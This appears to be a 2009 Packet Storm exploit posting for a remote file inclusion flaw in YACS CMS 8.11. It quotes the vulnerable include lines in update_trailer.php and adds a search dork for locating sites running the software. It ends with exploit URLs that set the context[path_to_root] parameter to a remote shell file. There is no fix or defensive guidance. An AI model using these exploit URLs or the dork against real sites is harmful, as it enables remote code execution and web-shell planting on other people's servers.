YACS CMS 8.11 Remote File Inclusion

2009-02-16T00:00:00
ID PACKETSTORM:74990
Type packetstorm
Reporter ahmadbady
Modified 2009-02-16T00:00:00

Description

                                        
                                            ` -----------------[remote file include]-----------------  
  
script: YACS version 8.11  
  
------------------------------------------------------------------  
  
download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip  
  
  
==============================================  
vul: /yacs/scripts/update_trailer.php line 21 23 25;  
  
  
include_once $context['path_to_root'].'shared/safe.php'; 21  
if(!class_exists('i18n'))  
include_once $context['path_to_root'].'i18n/i18n.php'; 23  
if(!class_exists('SQL'))  
include_once $context['path_to_root'].'shared/sql.php'; 25  
  
  
  
==============================================  
  
dork: "Powered by yacs"  
----------------------------------------------  
  
xpl:  
  
http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]  
  
http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]  
  
***************************************************  
***************************************************  
---------------------------------------------------  
Author: ahmadbady [kivi_hacker666@yahoo.com]  
  
from[iran]  
---------------------------------------------------  
  
  
`